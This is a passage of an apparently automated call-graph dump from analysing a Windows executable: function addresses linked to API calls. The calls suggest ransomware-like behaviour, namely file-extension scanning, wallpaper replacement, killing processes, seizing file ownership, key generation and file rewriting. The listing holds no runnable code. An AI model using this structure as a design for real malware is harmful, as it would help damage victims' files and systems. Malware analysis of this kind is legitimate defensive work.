4508->4500 4509 412182 4509->4509 5638 4123d0 GdipGetImageEncodersSize 4509->5638 4511 4121c9 4511->4507 4512 4121d2 GetTempPathW GetTempFileNameW 4511->4512 4513 41220e 4512->4513 4514 41222c wsprintfW GdipSaveImageToFile 4513->4514 4515 412264 4514->4515 4515->4507 4515->4515 4516 412312 RegOpenKeyA 4515->4516 4516->4507 4517 412337 4516->4517 4518 412347 RegSetValueExA 4517->4518 4518->4507 4519 41236e 4518->4519 4520 41237e RegSetValueExA 4519->4520 4520->4507 4521 41239c RegCloseKey SystemParametersInfoW 4520->4521 4521->4508 4523 411a90 4522->4523 4523->4523 4524 411a9a malloc 4523->4524 4528 411ab0 4524->4528 4525 411b6c SHGetFolderPathW 4526 411b94 4525->4526 4527 411b9b wsprintfW CreateFileW 4526->4527 4529 411bd8 WriteFile 4527->4529 4530 411c8f 4527->4530 4528->4525 4532 411c0c CloseHandle 4529->4532 4533 411bfe CloseHandle 4529->4533 4530->4348 5646 411ca0 4532->5646 4533->4348 4535 411c1d 4536 411c81 ShellExecuteW 4535->4536 4536->4530 4537->4351 4539 416d08 4538->4539 4540 416d0f wsprintfW MoveFileExW 4539->4540 5660 401ce0 4540->5660 4542 416dd5 ShellExecuteExW 4542->4353 4544 411a1c 4543->4544 4553 410594 4543->4553 4544->4370 4545 4112a1 lstrcmpiW 4546 411a02 FindNextFileW 4545->4546 4547 4112b9 lstrcmpiW 4545->4547 4548 411a15 FindClose 4546->4548 4546->4553 4547->4546 4549 4112d1 lstrcmpiW 4547->4549 4548->4544 4549->4546 4552 4112e9 lstrcmpiW 4549->4552 4550 411980 PathAddBackslashW 4550->4553 4551 41154b PathFindExtensionW 4551->4553 4554 4118b8 lstrcmpiW 4551->4554 4552->4546 4555 411301 lstrcmpiW 4552->4555 4553->4545 4553->4546 4553->4550 4553->4551 4553->4554 4564 411582 lstrcmpiW 4553->4564 4567 4119d8 SetFileAttributesW 4553->4567 4572 419500 77 API calls 4553->4572 4554->4553 4556 4118d0 lstrcmpiW 4554->4556 4555->4546 4557 411319 lstrcmpiW 4555->4557 4556->4553 4559 4118e8 lstrcmpiW 4556->4559 4557->4546 4558 411331 lstrcmpiW 4557->4558 4558->4546 4561 411346 lstrcmpiW 4558->4561 4559->4553 4560 411900 lstrcmpiW 4559->4560 4560->4553 4562 411918 lstrcmpiW 4560->4562 4561->4546 4563 41135e lstrcmpiW 4561->4563 4562->4553 4565 411930 lstrcmpiW 4562->4565 4563->4546 4566 411376 lstrcmpiW 4563->4566 4564->4553 4568 411591 lstrcmpiW 4564->4568 4565->4553 4570 411948 lstrcmpiW 4565->4570 4566->4546 4571 41138e lstrcmpiW 4566->4571 4567->4553 4568->4553 4569 4115a0 lstrcmpiW 4568->4569 4569->4553 4573 4115af lstrcmpiW 4569->4573 4570->4553 4571->4546 4574 4113a6 lstrcmpiW 4571->4574 4572->4553 4573->4553 4575 4115be lstrcmpiW 4573->4575 4574->4546 4576 4113be lstrcmpiW 4574->4576 4575->4553 4577 4115cd lstrcmpiW 4575->4577 4576->4546 4578 4113d6 lstrcmpiW 4576->4578 4577->4553 4579 4115df lstrcmpiW 4577->4579 4578->4546 4580 4113ee lstrcmpiW 4578->4580 4579->4553 4581 4115ee lstrcmpiW 4579->4581 4580->4546 4582 411406 lstrcmpiW 4580->4582 4581->4553 4583 4115fd lstrcmpiW 4581->4583 4582->4546 4584 41141e lstrcmpiW 4582->4584 4583->4553 4585 41160c lstrcmpiW 4583->4585 4584->4546 4586 411436 lstrcmpiW 4584->4586 4585->4553 4587 41161e lstrcmpiW 4585->4587 4586->4546 4588 41144e lstrcmpiW 4586->4588 4587->4553 4589 411630 lstrcmpiW 4587->4589 4588->4546 4590 411466 lstrcmpiW 4588->4590 4589->4553 4591 411642 lstrcmpiW 4589->4591 4590->4546 4592 41147e lstrcmpiW 4590->4592 4591->4553 4593 411654 lstrcmpiW 4591->4593 4592->4546 4594 411496 lstrcmpiW 4592->4594 4593->4553 4596 411666 lstrcmpiW 4593->4596 4594->4546 4595 4114ae lstrcmpiW 4594->4595 4595->4546 4597 4114c6 lstrcmpiW 4595->4597 4596->4553 4598 411678 lstrcmpiW 4596->4598 4597->4546 4599 4114de lstrcmpiW 4597->4599 4598->4553 4600 41168a lstrcmpiW 4598->4600 4599->4546 4601 4114f6 wsprintfW 4599->4601 4600->4553 4602 41169c lstrcmpiW 4600->4602 4604 410530 77 API calls 4601->4604 4602->4553 4603 4116ae lstrcmpiW 4602->4603 4603->4553 4605 4116c0 lstrcmpiW 4603->4605 4604->4553 4605->4553 4606 4116d2 lstrcmpiW 4605->4606 4606->4553 4607 4116e4 lstrcmpiW 4606->4607 4607->4553 4608 4116f6 lstrcmpiW 4607->4608 4608->4553 4609 411708 lstrcmpiW 4608->4609 4609->4553 4610 41171a lstrcmpiW 4609->4610 4610->4553 4611 41172c lstrcmpiW 4610->4611 4611->4553 4612 41173e lstrcmpiW 4611->4612 4612->4553 4613 411750 lstrcmpiW 4612->4613 4613->4553 4614 411762 lstrcmpiW 4613->4614 4614->4553 4615 411774 lstrcmpiW 4614->4615 4615->4553 4616 411786 lstrcmpiW 4615->4616 4616->4553 4617 411798 lstrcmpiW 4616->4617 4617->4553 4618 4117aa lstrcmpiW 4617->4618 4618->4553 4619 4117bc lstrcmpiW 4618->4619 4619->4553 4620 4117ce lstrcmpiW 4619->4620 4620->4553 4621 4117e0 lstrcmpiW 4620->4621 4621->4553 4622 4117f2 lstrcmpiW 4621->4622 4622->4553 4623 411804 lstrcmpiW 4622->4623 4623->4553 4624 411816 lstrcmpiW 4623->4624 4624->4553 4625 411828 lstrcmpiW 4624->4625 4625->4553 4626 41183a lstrcmpiW 4625->4626 4626->4553 4627 41184c lstrcmpiW 4626->4627 4627->4553 4628 41185e lstrcmpiW 4627->4628 4628->4553 4629 411870 lstrcmpiW 4628->4629 4629->4553 4630 411882 lstrcmpiW 4629->4630 4630->4553 4631 411894 lstrcmpiW 4630->4631 4631->4553 4632 4118a6 lstrcmpiW 4631->4632 4632->4553 4632->4554 4634 419950 4633->4634 4635 41995b lstrcmpiW 4634->4635 4641 419974 4634->4641 4635->4634 4635->4641 4636 419980 CreateFileW 4637 4199d9 GlobalAlloc wsprintfW NtSetInformationFile 4636->4637 4636->4641 4638 419ac4 NtClose 4637->4638 4639 419a68 GlobalAlloc 4637->4639 4640 419acb 4638->4640 4639->4638 4642 419a7b NtQueryInformationFile 4639->4642 4640->4370 4641->4636 4641->4640 4659 417880 4641->4659 4679 4127a0 NtOpenProcessToken malloc 4641->4679 4644 419ab6 GlobalFree GlobalFree 4642->4644 4646 419ad4 4642->4646 4644->4638 4645 419afd 4690 412920 LoadLibraryA 4645->4690 4646->4644 4646->4645 4649 419b38 4650 412920 6 API calls 4649->4650 4651 419b46 ReadFile 4650->4651 4652 419b91 4651->4652 4653 419b62 4651->4653 4699 417f20 4652->4699 4653->4652 4654 419b6f GlobalFree GlobalFree NtClose 4653->4654 4654->4370 4656 419b99 4657 419bc1 4656->4657 4658 419bb4 Sleep 4656->4658 4657->4370 4658->4657 4658->4658 4660 417898 GetModuleHandleA 4659->4660 4661 4178da 4659->4661 4660->4661 4662 417906 GetProcAddress 4661->4662 4663 417950 4662->4663 4663->4663 4664 417963 GetProcAddress 4663->4664 4665 417981 4664->4665 4667 417ee7 4664->4667 4666 4179a1 GetProcAddress GetProcAddress 4665->4666 4665->4667 4666->4667 4668 417aa2 4666->4668 4667->4641 4668->4667 4669 417b02 GetProcAddress 4668->4669 4670 417b1c 4669->4670 4676 417b43 4669->4676 4670->4641 4671 417ebb 4671->4641 4672 417be1 GetProcAddress 4672->4676 4673 417d20 malloc 4673->4676 4674 417e75 free 4674->4676 4675 417d9e CharLowerBuffW 4675->4676 4676->4671 4676->4672 4676->4673 4676->4674 4676->4675 4677 40f630 14 API calls 4676->4677 4713 416710 4676->4713 4677->4676 4680 4127dc NtQueryInformationToken 4679->4680 4681 41283e 4679->4681 4680->4681 4682 4127f5 InitializeSecurityDescriptor 4680->4682 4683 412845 CloseHandle 4681->4683 4684 41284c 4681->4684 4682->4681 4685 412805 SetSecurityDescriptorOwner 4682->4685 4683->4684 4686 412850 free 4684->4686 4687 41285a 4684->4687 4685->4681 4688 412816 SetFileSecurityW 4685->4688 4686->4687 4687->4641 4688->4681 4689 412829 SetFileSecurityW 4688->4689 4689->4681 4691 412a2a GetProcAddress 4690->4691 4692 4129ea CryptAcquireContextW 4690->4692 4693 412a44 4691->4693 4694 412a5b CryptAcquireContextW 4691->4694 4695 412a22 4692->4695 4696 412a05 CryptGenRandom 4692->4696 4693->4649 4694->4696 4697 412a76 4694->4697 4695->4649 4696->4693 4698 412a18 CryptReleaseContext 4696->4698 4697->4649 4698->4695 4728 4124f0 4699->4728 4701 417f40 PathRemoveFileSpecW 4702 417f80 4701->4702 4702->4702 4703 417f8d wsprintfW CreateFileW 4702->4703 4704 418021 4703->4704 4705 417fea NtSetInformationFile 4703->4705 4704->4656 4706 418029 GlobalAlloc 4705->4706 4707 418009 NtClose MessageBoxA 4705->4707 4708 418096 NtClose 4706->4708 4709 41803c WriteFile 4706->4709 4707->4704 4708->4656 4710 418082 4709->4710 4711 4180a5 4709->4711 4710->4711 4712 41808f GlobalFree 4710->4712 4711->4656 4712->4708 4727 4124f0 4713->4727 4715 416734 CreateToolhelp32Snapshot 4716 4167b8 GetCurrentProcessId 4715->4716 4717 416758 Process32First 4715->4717 4718 4167c2 OpenProcess 4716->4718 4719 4167ed 4716->4719 4721 416768 4717->4721 4718->4719 4722 4167d6 TerminateProcess CloseHandle 4718->4722 4719->4676 4720 4167b5 CloseHandle 4720->4716 4721->4720 4723 416770 GetCurrentProcessId 4721->4723 4724 4167a3 Process32Next 4721->4724 4722->4676 4723->4724 4725 416780 OpenProcess 4723->4725 4724->4721 4725->4721 4726 416794 TerminateProcess CloseHandle 4725->4726 4726->4721 4727->4715 4728->4701 4731 41a589 4729->4731 4730 41a693 4730->4406 4731->4730 4731->4731 4732 41a65c CoGetObject 4731->4732 4732->4406 4734 401380 4733->4734 4734->4429 4734->4734 4735->4436 4740 418651 4736->4740 4737 418671 RegCreateKeyExA 4738 4186a1 RegQueryValueExA RegQueryValueExA 4737->4738 4739 418873 4737->4739 4738->4740 4743 40f630 14 API calls 4739->4743 4740->4737 4741 4187a9 4740->4741 4742 418763 Sleep 4740->4742 4747 418778 4740->4747 4773 418e60 4741->4773 4742->4740 4745 4188aa 4743->4745 4748 418e60 54 API calls 4745->4748 4746 4187b1 4749 418c78 4746->4749 4801 418c90 4746->4801 4753 40f630 14 API calls 4747->4753 4751 4188b5 4748->4751 4749->4446 4751->4749 4756 418c90 51 API calls 4751->4756 4752 4187cd 4752->4749 4754 4187d5 RegSetValueExA RegSetValueExA RegCloseKey 4752->4754 4755 418795 RegCloseKey 4753->4755 4757 4188d1 4754->4757 4755->4757 4756->4757 4757->4749 4819 40c0e0 4757->4819 4759 41891a 4759->4749 4760 40c0e0 5 API calls 4759->4760 4761 41893a 4760->4761 4761->4749 4830 40d720 4761->4830 4763 418963 4763->4749 4764 418a12 malloc 4763->4764 4765 418a3f 4764->4765 4766 418a57 CryptBinaryToStringA 4765->4766 4766->4749 4767 418a83 4766->4767 4767->4767 4768 418ac9 CharUpperA CryptBinaryToStringA 4767->4768 4768->4749 4769 418b20 4768->4769 4769->4769 4770 418b59 CharUpperA 4769->4770 4772 418b8f 4770->4772 4771 418c57 free 4771->4446 4772->4771 4774 418e7b 4773->4774 4775 412920 6 API calls 4774->4775 4776 418ee2 4775->4776 4796 418f8a 4776->4796 4842 40d440 4776->4842 4779 418f3c 4779->4796 4876 40d1d0 4779->4876 4781 40add0 free 4783 419098 4781->4783 4785 40add0 free 4783->4785 4786 4190a1 4785->4786 4788 40add0 free 4786->4788 4789 4190aa 4788->4789 4790 40add0 free 4789->4790 4791 4190b3 4790->4791 4792 40add0 free 4791->4792 4793 4190bc 4792->4793 4794 40add0 free 4793->4794 4795 4190c5 4794->4795 4797 40add0 free 4795->4797 4897 40add0 4796->4897 4798 4190ce 4797->4798 4901 40d3a0 4798->4901 4800 4190da 4800->4746 4802 418cb3 4801->4802 4803 40c0e0 5 API calls 4802->4803 4804 418cdd 4803->4804 4805 418e07 4804->4805 4806 40c0e0 5 API calls 4804->4806 4807 40add0 free 4805->4807 4808 418cf8 4806->4808 4809 418e1c 4807->4809 4808->4805 4812 40d720 3 API calls 4808->4812 4810 40add0 free 4809->4810 4811 418e25 4810->4811 4813 40d3a0 free 4811->4813 4814 418d1b 4812->4814 4815 418e2f 4813->4815 4814->4805 4816 412920 6 API calls 4814->4816 4815->4752 4817 418d4f 4816->4817 4817->4805 5338 40d800 4817->5338 4820 40c19e 4819->4820 4821 40c116 4819->4821 4822 40bbf0 2 API calls 4820->4822 4823 40c132 4821->4823 4825 40c127 free 4821->4825 4828 40c1ac 4822->4828 4823->4820 4824 40c14e 4823->4824 4826 40c15e calloc 4823->4826 4824->4759 4825->4823 4826->4824 4827 40c16f 4826->4827 4827->4820 4829 40c193 free 4827->4829 4828->4759 4829->4820 4831 40d739 4830->4831 4832 40d72f 4830->4832 4834 40d751 4831->4834 4835 409f60 3 API calls 4831->4835 4838 40d799 4831->4838 4833 409f60 3 API calls 4832->4833 4833->4831 4836 40d769 4834->4836 4837 409f60 3 API calls 4834->4837 4834->4838 4835->4834 4836->4838 4839 409f60 3 API calls 4836->4839 4840 40d781 4836->4840 4837->4836 4838->4763 4839->4840 4840->4838 4841 409f60 3 API calls 4840->4841 4841->4838 4843 40d70a 4842->4843 4844 40d455 4842->4844 4843->4779 4844->4843 4927 40bbf0 4844->4927 4846 40d4a4 4875 40d642 4846->4875 4933 40b090 4846->4933 4848 40add0 free 4849 40d64f 4848->4849 4850 40add0 free 4849->4850 4851 40d658 4850->4851 4853 40add0 free 4851->4853 4852 40b090 37 API calls 4864 40d4cd 4852->4864 4854 40d661 4853->4854 4855 40d702 4854->4855 4857 40d3a0 free 4854->4857 4855->4779 4858 40d672 4857->4858 4858->4779 4859 40c510 8 API calls 4859->4864 4861 40ae20 10 API calls 4861->4864 4864->4852 4864->4859 4864->4861 4865 40d681 4864->4865 4864->4875 4953 40c550 4864->4953 4962 40bf10 4864->4962 4978 40a040 4864->4978 5032 40b500 4864->5032 5081 409c90 4865->5081 4868 409c90 8 API calls 4869 40d69c 4868->4869 4870 40bf10 9 API calls 4869->4870 4869->4875 4871 40d6b3 4870->4871 4871->4875 5084 40edc0 4871->5084 4875->4848 4877 40d1e4 4876->4877 4878 40d25c 4877->4878 4880 409f60 3 API calls 4877->4880 4887 40d2b6 4877->4887 4879 40d274 4878->4879 4881 409f60 3 API calls 4878->4881 4878->4887 4882 40d289 4879->4882 4883 409f60 3 API calls 4879->4883 4879->4887 4880->4878 4881->4879 4884 409f60 3 API calls 4882->4884 4885 40d29e 4882->4885 4882->4887 4883->4882 4884->4885 4886 409f60 3 API calls 4885->4886 4885->4887 4886->4887 4887->4796 4888 40d2d0 4887->4888 4890 40d2e2 4888->4890 4889 40d38e 4889->4796 4890->4889 4891 40d34a 4890->4891 4892 409f60 3 API calls 4890->4892 4893 40d362 4891->4893 4894 409f60 3 API calls 4891->4894 4895 40d37a 4891->4895 4892->4891 4893->4895 4896 409f60 3 API calls 4893->4896 4894->4893 4895->4796 4896->4895 4898 40addb 4897->4898 4899 40adfa 4897->4899 4898->4899 4900 40adef free 4898->4900 4899->4781 4900->4899 4902 40d3af 4901->4902 4926 40d424 4901->4926 4903 40add0 free 4902->4903 4904 40d3bb 4903->4904 4905 40add0 free 4904->4905 4906 40d3c7 4905->4906 4907 40add0 free 4906->4907 4908 40d3d0 4907->4908 4909 40add0 free 4908->4909 4910 40d3d9 4909->4910 4911 40add0 free 4910->4911 4912 40d3e2 4911->4912 4913 40add0 free 4912->4913 4914 40d3eb 4913->4914 4915 40add0 free 4914->4915 4916 40d3f4 4915->4916 4917 40add0 free 4916->4917 4918 40d3fd 4917->4918 4919 40add0 free 4918->4919 4920 40d409 4919->4920 4921 40add0 free 4920->4921 4922 40d412 4921->4922 4923 40add0 free 4922->4923 4924 40d41b 4923->4924 4925 40add0 free 4924->4925 4925->4926 4926->4800 4928 40bc00 calloc 4927->4928 4929 40bc48 4927->4929 4930 40bc12 4928->4930 4931 40bc19 4928->4931 4929->4846 4930->4846 4931->4929 4932 40bc3d free 4931->4932 4932->4929 4934 40b430 4933->4934 4935 40b0a7 4933->4935 4934->4864 5104 40acd0 4935->5104 4937 40b1d8 4938 40acd0 5 API calls 4937->4938 4941 40b262 4937->4941 4942 40b269 4937->4942 5115 40c330 4937->5115 5120 40bab0 4937->5120 4938->4937 4941->4864 4943 40b30f 4942->4943 5125 409cd0 4942->5125 4943->4941 5134 409f60 4943->5134 4946 40b326 4947 40b40a 4946->4947 4948 40c330 2 API calls 4946->4948 4947->4941 4949 40b41e free 4947->4949 4951 40b33e 4948->4951 4949->4941 4950 409cd0 8 API calls 4950->4951 4951->4947 4951->4950 4952 40c7e0 36 API calls 4951->4952 4952->4951 4954 40c5a7 4953->4954 4955 40c569 4953->4955 4956 409ac0 7 API calls 4954->4956 4957 40c575 4955->4957 4958 40c58c 4955->4958 4961 40c580 4956->4961 4960 40c440 4 API calls 4957->4960 4959 40c440 4 API calls 4958->4959 4959->4961 4960->4961 4961->4864 4963 40bf56 4962->4963 4964 40bf4c 4962->4964 4966 409f60 3 API calls 4963->4966 4967 40c0b9 4963->4967 4969 40bf7d 4963->4969 4965 409f60 3 API calls 4964->4965 4965->4963 4966->4969 4968 40c0d6 4967->4968 4972 40c0cd free 4967->4972 4968->4864 4970 40bfe7 calloc 4969->4970 4974 40c035 4969->4974 4977 40bfd8 4969->4977 4975 40c003 4970->4975 4970->4977 4971 40bbf0 2 API calls 4971->4977 4972->4968 4973 40c0b0 free 4973->4967 4974->4971 4975->4974 4976 40c027 free 4975->4976 4976->4974 4977->4967 4977->4973 4980 40a06f 4978->4980 4979 40a076 4979->4864 4980->4979 4981 40a139 4980->4981 4982 40a0fa 4980->4982 4983 409f60 3 API calls 4981->4983 4984 40a108 4982->4984 4986 40bbf0 2 API calls 4982->4986 4985 40a143 4983->4985 4987 40a123 4984->4987 4989 409f60 3 API calls 4984->4989 4988 40a21b 4985->4988 4990 409f60 3 API calls 4985->4990 4986->4984 4987->4864 4991 40a23b 4988->4991 4995 40a232 free 4988->4995 4989->4987 4993 40a15c 4990->4993 4992 40a258 4991->4992 4996 40a24f free 4991->4996 4994 40a275 4992->4994 4999 40a26c free 4992->4999 4993->4988 4997 40b470 2 API calls 4993->4997 4998 40a292 4994->4998 5001 40a289 free 4994->5001 4995->4991 4996->4992 5000 40a187 4997->5000 4998->4987 5003 40a2a3 free 4998->5003 4999->4994 5000->4988 5002 40bbf0 2 API calls 5000->5002 5001->4998 5004 40a19e 5002->5004 5003->4987 5004->4988 5005 40b470 2 API calls 5004->5005 5006 40a1b2 5005->5006 5006->4988 5007 40b470 2 API calls 5006->5007 5008 40a1c6 5007->5008 5008->4988 5009 40a20e 5008->5009 5010 40c1f0 2 API calls 5008->5010 5009->4988 5011 40c1f0 2 API calls 5009->5011 5012 40a1fb 5010->5012 5018 40a2d9 5011->5018 5012->4988 5013 40c1f0 2 API calls 5012->5013 5013->5009 5014 40a335 5015 40c330 2 API calls 5014->5015 5026 40a33f __aulldiv 5015->5026 5016 40c550 8 API calls 5016->5018 5017 40a545 5019 40a55b 5017->5019 5020 409f60 3 API calls 5017->5020 5018->4988 5018->5014 5018->5016 5019->4988 5021 40c330 2 API calls 5019->5021 5020->5019 5022 40a58c 5021->5022 5022->4988 5024 409f60 3 API calls 5022->5024 5023 40bbf0 calloc free 5023->5026 5024->4988 5025 40bf10 9 API calls 5025->5026 5026->4988 5026->5017 5026->5023 5026->5025 5028 40c550 8 API calls 5026->5028 5029 409f60 3 API calls 5026->5029 5030 40c1f0 calloc free 5026->5030 5031 409cd0 8 API calls 5026->5031 5260 40bed0 5026->5260 5028->5026 5029->5026 5030->5026 5031->5026 5033 40b52f 5032->5033 5034 40b536 5033->5034 5263 40ae20 5033->5263 5034->4864 5036 40b649 5037 40ba2d 5036->5037 5040 40ba24 free 5036->5040 5039 40ba4a 5037->5039 5044 40ba41 free 5037->5044 5038 40b60d 5038->5036 5043 40bd30 23 API calls 5038->5043 5041 40ba67 5039->5041 5045 40ba5e free 5039->5045 5040->5037 5042 40ba84 5041->5042 5048 40ba7b free 5041->5048 5046 40baa1 5042->5046 5050 40ba98 free 5042->5050 5047 40b65e 5043->5047 5044->5039 5045->5041 5046->4864 5051 409f60 3 API calls 5047->5051 5052 40b997 5047->5052 5048->5042 5049 40b9b9 5053 40b9d6 5049->5053 5058 40b9cd free 5049->5058 5050->5046 5054 40b678 5051->5054 5052->5049 5055 40b9b0 free 5052->5055 5056 40b9f3 5053->5056 5059 40b9ea free 5053->5059 5054->5052 5057 409f60 3 API calls 5054->5057 5055->5049 5056->5036 5061 40ba07 free 5056->5061 5060 40b68f 5057->5060 5058->5053 5059->5056 5060->5052 5062 409f60 3 API calls 5060->5062 5061->5036 5063 40b6a6 5062->5063 5063->5052 5064 40bbf0 2 API calls 5063->5064 5065 40b6be 5064->5065 5065->5052 5066 40bbf0 2 API calls 5065->5066 5067 40b6d5 5066->5067 5067->5052 5068 40bbf0 2 API calls 5067->5068 5069 40b6ec 5068->5069 5069->5052 5070 40bbf0 2 API calls 5069->5070 5071 40b704 5070->5071 5071->5052 5072 409cd0 8 API calls 5071->5072 5073 40c550 8 API calls 5071->5073 5074 40c330 calloc free 5071->5074 5076 40b91a 5071->5076 5072->5071 5073->5071 5074->5071 5075 409cd0 8 API calls 5075->5076 5076->5052 5076->5075 5080 40b955 5076->5080 5077 40b98b 5078 409f60 3 API calls 5077->5078 5078->5052 5079 40c550 8 API calls 5079->5080 5080->5052 5080->5077 5080->5079 5082 409cd0 8 API calls 5081->5082 5083 409cc9 5082->5083 5083->4868 5083->4875 5085 40edd3 5084->5085 5097 40ee01 5085->5097 5283 40c510 5085->5283 5087 40c510 8 API calls 5091 40ee1f 5087->5091 5088 40ee35 5089 40ee51 5088->5089 5092 40b500 34 API calls 5088->5092 5093 40add0 free 5089->5093 5091->5089 5096 40bd30 23 API calls 5091->5096 5092->5089 5094 40d6e2 5093->5094 5094->4875 5098 40d0b0 5094->5098 5095 40bd30 23 API calls 5095->5097 5096->5088 5097->5087 5097->5088 5097->5089 5099 40d0bf 5098->5099 5103 40d110 5099->5103 5286 40f020 5099->5286 5103->4875 5105 40ad8e 5104->5105 5106 40ad06 5104->5106 5107 40bbf0 2 API calls 5105->5107 5108 40ad22 5106->5108 5110 40ad17 free 5106->5110 5113 40ad9c 5107->5113 5108->5105 5109 40ad3e 5108->5109 5111 40ad4e calloc 5108->5111 5109->4937 5110->5108 5111->5109 5112 40ad5f 5111->5112 5112->5105 5114 40ad83 free 5112->5114 5113->4937 5114->5105 5116 40c35a 5115->5116 5117 40bbf0 2 API calls 5116->5117 5119 40c364 5116->5119 5118 40c40e 5117->5118 5118->4937 5119->4937 5122 40baf4 5120->5122 5121 40bb6d 5121->4937 5122->5121 5144 40c7e0 5122->5144 5124 40bb8a 5124->4937 5126 409d27 5125->5126 5127 409ce9 5125->5127 5128 409ac0 7 API calls 5126->5128 5129 409cf5 5127->5129 5130 409d0c 5127->5130 5133 409d00 5128->5133 5131 40c440 4 API calls 5129->5131 5132 40c440 4 API calls 5130->5132 5131->5133 5132->5133 5133->4943 5135 409f7c 5134->5135 5136 409f6f 5134->5136 5135->4946 5137 409f85 5136->5137 5138 409f76 5136->5138 5140 409fb2 5137->5140 5141 409fbc calloc 5137->5141 5139 40add0 free 5138->5139 5139->5135 5140->4946 5141->5140 5142 409fd0 5141->5142 5142->5140 5143 409ff4 free 5142->5143 5143->5140 5145 40c876 5144->5145 5146 40c8c7 5144->5146 5148 40c8a5 5145->5148 5149 40c885 5145->5149 5182 409ac0 5146->5182 5151 40c440 4 API calls 5148->5151 5173 40c440 5149->5173 5150 40cbdf 5154 40cbfe 5150->5154 5158 40cbf3 free 5150->5158 5155 40c890 5151->5155 5153 40cbba 5153->5150 5156 40cbd4 free 5153->5156 5160 40cc12 free 5154->5160 5162 40cc1d 5154->5162 5155->5153 5157 409f60 3 API calls 5155->5157 5156->5150 5161 40c900 5157->5161 5158->5154 5159 40cc51 5159->5124 5160->5162 5161->5153 5164 40c330 2 API calls 5161->5164 5163 40cc37 5162->5163 5165 40cc2e free 5162->5165 5163->5159 5166 40cc48 free 5163->5166 5170 40c919 5164->5170 5165->5163 5166->5159 5167 40acd0 5 API calls 5167->5170 5168 40cc64 5168->5124 5170->5153 5170->5167 5170->5168 5171 40bf10 9 API calls 5170->5171 5193 40a5e0 5170->5193 5236 40bd30 5170->5236 5171->5170 5175 40c453 5173->5175 5174 40c45a 5174->5155 5175->5174 5176 40c48a 5175->5176 5177 409f60 3 API calls 5175->5177 5178 409f60 3 API calls 5176->5178 5179 40c4a8 5176->5179 5177->5176 5178->5179 5180 40c506 5179->5180 5181 40c4fd free 5179->5181 5180->5155 5181->5180 5183 409add 5182->5183 5184 409ae4 5182->5184 5185 409f60 3 API calls 5183->5185 5186 409c75 5184->5186 5187 409b31 calloc 5184->5187 5191 409b7b 5184->5191 5185->5184 5186->5155 5187->5186 5188 409b49 5187->5188 5189 409b6d free 5188->5189 5188->5191 5189->5191 5190 409bfd calloc 5190->5186 5190->5191 5191->5186 5191->5190 5192 409c32 free 5191->5192 5192->5191 5195 40a613 5193->5195 5194 40acbb 5194->5170 5195->5194 5247 40b470 5195->5247 5197 40a73c 5199 40b470 2 API calls 5197->5199 5203 40abb8 5197->5203 5198 40ac2b 5200 40ac4e 5198->5200 5205 40ac45 free 5198->5205 5201 40a758 5199->5201 5202 40ac6b 5200->5202 5207 40ac62 free 5200->5207 5201->5203 5204 40b470 2 API calls 5201->5204 5208 40ac7f free 5202->5208 5212 40ac88 5202->5212 5203->5198 5209 40ac00 free 5203->5209 5206 40a774 5204->5206 5205->5200 5206->5203 5211 40a798 5206->5211 5213 409f60 3 API calls 5206->5213 5207->5202 5208->5212 5209->5203 5210 40acb2 5210->5170 5211->5203 5215 40bbf0 2 API calls 5211->5215 5217 40a7bf 5211->5217 5212->5210 5214 40aca9 free 5212->5214 5213->5211 5214->5210 5216 40a7db 5215->5216 5216->5203 5254 40c1f0 5216->5254 5217->5203 5220 40a857 5217->5220 5221 40a84a 5217->5221 5219 40a7f8 5219->5203 5224 40bd30 23 API calls 5219->5224 5223 409f60 3 API calls 5220->5223 5222 40bd30 23 API calls 5221->5222 5225 40a852 5222->5225 5223->5225 5224->5217 5225->5203 5226 409f60 3 API calls 5225->5226 5227 40a89a 5226->5227 5227->5203 5228 40b470 2 API calls 5227->5228 5233 40a9eb 5227->5233 5229 40a8fa 5228->5229 5229->5203 5230 409f60 3 API calls 5229->5230 5231 40a916 5230->5231 5231->5203 5232 40b470 2 API calls 5231->5232 5231->5233 5235 409f60 3 API calls 5231->5235 5232->5231 5233->5203 5234 409cd0 8 API calls 5233->5234 5234->5203 5235->5231 5237 40bd5f 5236->5237 5238 40bd66 5237->5238 5239 40a040 23 API calls 5237->5239 5238->5170 5243 40bd81 5239->5243 5240 40beb8 5240->5170 5241 409ac0 7 API calls 5241->5243 5242 409ac0 7 API calls 5246 40be4a 5242->5246 5243->5240 5243->5241 5244 40c440 calloc free free free 5243->5244 5243->5246 5244->5243 5245 40c440 calloc free free free 5245->5246 5246->5240 5246->5242 5246->5245 5248 40b481 5247->5248 5249 40b4d6 5247->5249 5250 40b489 calloc 5248->5250 5251 40b4c9 5248->5251 5249->5197 5250->5249 5252 40b49a 5250->5252 5251->5197 5252->5251 5253 40b4be free 5252->5253 5253->5251 5255 40c217 5254->5255 5256 40c25b calloc 5255->5256 5257 40c249 5255->5257 5256->5257 5258 40c26c 5256->5258 5257->5219 5257->5257 5258->5257 5259 40c290 free 5258->5259 5259->5257 5261 40bf10 9 API calls 5260->5261 5262 40beff 5261->5262 5262->5026 5264 409f60 3 API calls 5263->5264 5265 40ae5d 5264->5265 5266 40b042 5265->5266 5268 409f60 3 API calls 5265->5268 5267 40b067 5266->5267 5270 40b05e free 5266->5270 5269 40b081 5267->5269 5271 40b078 free 5267->5271 5272 40ae76 5268->5272 5269->5038 5270->5267 5271->5269 5272->5266 5273 40c330 2 API calls 5272->5273 5274 40aeab 5273->5274 5274->5266 5275 40c330 2 API calls 5274->5275 5280 40aec2 5275->5280 5276 40c1f0 2 API calls 5277 40b02d 5276->5277 5277->5266 5278 409f60 3 API calls 5277->5278 5278->5266 5279 40c330 calloc free 5279->5280 5280->5266 5280->5279 5281 40c440 calloc free free free 5280->5281 5282 40b020 5280->5282 5281->5280 5282->5276 5284 40c550 8 API calls 5283->5284 5285 40c549 5284->5285 5285->5089 5285->5095 5287 40f034 5286->5287 5288 40f05e 5287->5288 5289 40bab0 36 API calls 5287->5289 5290 40f07f 5287->5290 5288->5290 5291 40f262 5288->5291 5292 40bab0 36 API calls 5288->5292 5289->5288 5290->5291 5293 40bf10 9 API calls 5290->5293 5296 40f0ad 5290->5296 5294 40add0 free 5291->5294 5292->5290 5293->5296 5295 40f28a 5294->5295 5297 40add0 free 5295->5297 5296->5291 5299 40bf10 9 API calls 5296->5299 5298 40d0f2 5297->5298 5298->5103 5314 40ee70 5298->5314 5300 40f1a7 5299->5300 5300->5291 5301 40c510 8 API calls 5300->5301 5302 40f1c0 5301->5302 5302->5291 5303 40c510 8 API calls 5302->5303 5304 40f1d9 5303->5304 5304->5291 5305 40bd30 23 API calls 5304->5305 5306 40f1f4 5305->5306 5306->5291 5307 40bf10 9 API calls 5306->5307 